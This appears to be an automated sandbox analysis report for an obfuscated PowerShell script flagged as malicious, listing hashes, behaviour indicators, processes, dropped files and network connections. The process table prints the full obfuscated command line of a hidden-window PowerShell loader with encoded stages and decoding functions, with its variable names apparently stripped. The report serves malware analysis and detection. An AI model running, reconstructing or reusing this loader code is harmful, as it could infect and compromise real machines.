| File name: | ps1.ps1 |
| Full analysis: | https://app.any.run/tasks/c7206e66-453d-4ea9-b4af-a602a928c762 |
| Verdict: | Malicious activity |
| Analysis date: | February 18, 2026, 11:30:09 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with very long lines (3320), with no line terminators |
| MD5: | 5E30054BD680B9F28E8FAD82A9B4076C |
| SHA1: | 5D453985BE0F3A3EC5C9E77BEF860BA6CED0B273 |
| SHA256: | C52BE6C430AF5AF99DD11FD2DD7E854B49B201DDAE555B4325EE4A5961E088E6 |
| SSDEEP: | 96:30NxzW/cLb7uiye1lAzmdAM8nCVdd8NSjDzv/tf:kby/+n//MmdAxnMXtDztf |
MALICIOUS
Run PowerShell with an invisible window
- powershell.exe (PID: 3088)
SUSPICIOUS
Application launched itself
- powershell.exe (PID: 7392)
Starts POWERSHELL.EXE for commands execution
- powershell.exe (PID: 7392)
Obfuscation pattern (POWERSHELL)
- powershell.exe (PID: 3088)
Bypass execution policy to execute commands
- powershell.exe (PID: 7392)
The process executes Powershell scripts
- powershell.exe (PID: 7392)
Escape characters obfuscation (POWERSHELL)
- powershell.exe (PID: 3088)
INFO
Drops script file
- powershell.exe (PID: 7392)
- powershell.exe (PID: 3088)
Script raised an exception (POWERSHELL)
- powershell.exe (PID: 3088)
Checks proxy server information
- slui.exe (PID: 2284)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
147
Monitored processes
4
Malicious processes
1
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2284 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3088 | "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "function vekselsa (,=1,=32) { =;=3+;=-;do {+=[];+=4} until (![])}function Klarin () {.() ()}function verg (,) {Klarin (vekselsa 'EE,[<<<i hhn TTt % ] TT Er|| oO OlOO offfgbbbappp ==-iiibNNNx.hhoooorqqq ww[ ZZiSSSndd.tccc]MM $|||fll oJJJn<<<lRRRyhhhlOOOi YYt cct___o')}Function Indemn (,=0){='halfpac';='asylansg194';='beklage';='ablativalh';='untwi';='drubbingsa';='intervalde';='dubbing';=@(75,97,116,111,100,101,115,116,114,97);='bourn';='foru';='ravishme';='espera';='storkenuns';='sahuar';='signetsh';='grundfsthu48';Klarin (vekselsa ' aa$!!!gOOOlxxxoKKKb IIa##,l vv:f fsjjje ^lOO,v cc=SSS[ yyCxxxoDDDnzzzv c eooorqqqtnn ]^^^:lll:M MFjjjrN No //m fB:.:a?? syy,eTTT6 ||4 WWS XXtAAAr ,hiQQ,naaagccc( ;;^^^aEEEm KKm&&,e&.&rOOO)');='barber';='mudderets';='philha';='romanceis';='boniformst';='hestearbej';='stetis';='batted';For(=0; -lt .Length; ++){[] = verg [] [%10]}Klarin (vekselsa '???,gqqql%%,o <,b ppauuul>>>: eeskkku x pnnne--.rHHHsGGGe PPncccsYYY=DDD[/ /Tr.re nnxuuut.LL.WWWExxxnCC crrroCCCd~~~iIIInII gMMM] HH:III:KKKAmmmS ##CjjjIMMMIp p..SSGWWWe XXtUUUSdddtG,Gr---i aanXXXgVV ( ~~$##.s mme^^^l,TTvmmm)');if () { Klarin }else {;}}=vekselsa ' MMi r e ddx';=Indemn 'fk9ET0wyGhoWDjwSVCEwRUJEXFFwQSMGClNHT1IZfVVPTxYTSUVGV2VRXU8jABAfHU55UUVfVFRDRVInIhMRCQsdXEVGV2VR';=Indemn 'IxUAHxdfXFsWEyIXEUEDChwTHgRlAhsCSxAQSxcZOw4GG1kBHAMcDSQAEEkNAU5FPSp/OExCFlUQIhVMDTQxLiYDJxk3NwgZTFtUNAoHFjQ=';=Indemn 'dQ==';='\Triticin.Tro';Indemn 'bwYYAAYEH04fCCUISUsBCwVOExE7BRUbBU5XHBMUJQIcARIKGhcX' 1;Indemn 'bwYYAAYEH04AACkUGAYXERpJVgkuABBBFxUfHQZJbxUVHBcKHAcCAGI=' 1;Indemn 'EC8RG0o2FgYECCgEJAANCwc5Ew8qBhEdOV9JJxcCPhMdGx01ARsGDigOGFJXVURG' 1;=[0];=(Indemn 'bwYYAAYEH04ZACwEBwQBB046FxZmLhYFAQYHVDwEP08jCgYmHx0XDz8=');Klarin ();Indemn 'bwoVCAEWGBEQTwMEFQsBFwAvKS8uFVonEBEDJhcQPgQHGywAEhAXExZVRDJZQQcNAg4nDkdf' 1;=Indemn 'Dw4DAQgKEhA0CCcE';=Indemn 'bwoVCAEWGBEQT28THQgXFxYCG08CDwIADwBbUBoEKgVYSwAMABdb';=;Indemn 'bwYYAAYEH04XESISAA0BFhIaT0kfBAcbSTUSABpBbwUdHAdM' 1;while (!) {Indemn 'bwYYAAYEH04zBioNFRcNBB9JVhU+FxU=' 1;Klarin ;Indemn 'GA0RChRNR10=' 1;Indemn 'bwYYAAYEH04XESISAA0BFhIaT0kfBAcbSTUSABpBbwUdHAdM' 1 ;Indemn 'bwYYAAYEH04BETkIGgQIDE5QFQ0kAxUDXg4BDRYTIg8TRE9AVwYTAz4NHRwQDF0XHRQlFQ==' 1;=[]}=274209;=14924;Indemn 'bwYYAAYEH04dDCATSQgHRVcQGxIo' 1;Indemn 'bwYYAAYEH04xCSoIBhgFHE4vMQ4lFxEdEDhJTjQTJAw2DhcARUAhFTkIGghMQRwZGRNi' 1;Indemn 'bwYYAAYEH04WCDkEHxsLWCggFxk/TzEBBwoXHRwGFltOLjcmOj1cJi4VJxsWDB0TWkUICRUGFhISDVs=' 1;Indemn 'bwYYAAYEH04BBCYIEAoHWFcQGxMuCgAAShYGFgEVOQgaCExBFRABBCcSEA4QCl9QEQAnABYdBRYWGFs=' 1;Klarin ;#Lystyacht Radioa Nonloyalty Uiexothe Herois Testpr Systems ;" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7392 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\Desktop\ps1.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 9152 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
11 630
Read events
11 630
Write events
0
Delete events
0
Modification events
Executable files
0
Suspicious files
1
Text files
4
Unknown types
3
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 7392 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J34BHXGG9Z88TR405EYE.temp | binary | |
MD5:787D66151A2ADD6217EE904DB61F73E0 | SHA256:3D703E2788FB824A34A5BBBDC10B341AFDB707D02703921ECF529AB8D9B591EE | |||
| 7392 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms | binary | |
MD5:787D66151A2ADD6217EE904DB61F73E0 | SHA256:3D703E2788FB824A34A5BBBDC10B341AFDB707D02703921ECF529AB8D9B591EE | |||
| 7392 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF1e61d5.TMP | binary | |
MD5:00A03B286E6E0EBFF8D9C492365D5EC2 | SHA256:4DBFC417D053BA6867308671F1C61F4DCAFC61F058D4044DB532DA6D3BDE3615 | |||
| 7392 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xvihmrd2.452.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7392 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_gcfog2zp.5vb.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 3088 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_sk3x3shl.fyz.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 3088 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ztc4kgei.g5q.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 3088 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:36731036E7A735A171453471A3F4E40D | SHA256:F53BC79FFC4C404D59D5714E1A63F6D6B359D170DAC7D3DC0C2C1AE9F94CD3AD | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
54
TCP/UDP connections
50
DNS requests
19
Threats
1
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5512 | RUXIMICS.exe | GET | 304 | 51.124.78.146:443 | https://settings-win.data.microsoft.com/settings/v3.0/WSD/RUXIM?os=Windows&osVer=10.0.19045.4046.amd64fre.vb_release.191206-1406&sku=48&deviceClass=Windows.Desktop&locale=en-US&deviceId=s:BAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&sampleId=s:95271487&appVer=10.0.19041.3623&OSVersionFull=10.0.19045.4046.amd64fre.vb_release.191206-1406&FlightRing=Retail&AttrDataVer=186&App=RUXIM&AppVer=&DeviceFamily=Windows.Desktop | US | — | — | whitelisted |
2392 | SIHClient.exe | GET | 304 | 20.165.94.63:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | US | — | — | whitelisted |
4468 | svchost.exe | GET | 200 | 23.216.77.28:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | NL | binary | 825 b | whitelisted |
5512 | RUXIMICS.exe | GET | 200 | 23.216.77.28:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | NL | binary | 825 b | whitelisted |
4468 | svchost.exe | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | US | binary | 814 b | whitelisted |
6768 | MoUsoCoreWorker.exe | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | US | binary | 814 b | whitelisted |
5512 | RUXIMICS.exe | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | US | binary | 814 b | whitelisted |
— | — | POST | 200 | 20.190.159.71:443 | https://login.live.com/RST2.srf | US | binary | 11.1 Kb | whitelisted |
2392 | SIHClient.exe | GET | 200 | 20.165.94.54:443 | https://fe3cr.delivery.mp.microsoft.com/clientwebservice/ping | US | — | — | whitelisted |
356 | svchost.exe | POST | 200 | 20.190.160.14:443 | https://login.live.com/RST2.srf | US | — | 11.1 Kb | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | Not routed | — | whitelisted |
4468 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
5512 | RUXIMICS.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
6768 | MoUsoCoreWorker.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
— | — | 172.211.123.248:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
4 | System | 192.168.100.255:138 | — | Not routed | — | whitelisted |
6768 | MoUsoCoreWorker.exe | 23.216.77.28:80 | crl.microsoft.com | AKAMAI-ASN1 | NL | whitelisted |
4468 | svchost.exe | 23.216.77.28:80 | crl.microsoft.com | AKAMAI-ASN1 | NL | whitelisted |
5512 | RUXIMICS.exe | 23.216.77.28:80 | crl.microsoft.com | AKAMAI-ASN1 | NL | whitelisted |
4468 | svchost.exe | 88.221.169.152:80 | www.microsoft.com | AKAMAI-AS | US | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
self.events.data.microsoft.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
login.live.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
5512 | RUXIMICS.exe | Unknown Traffic | ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW) |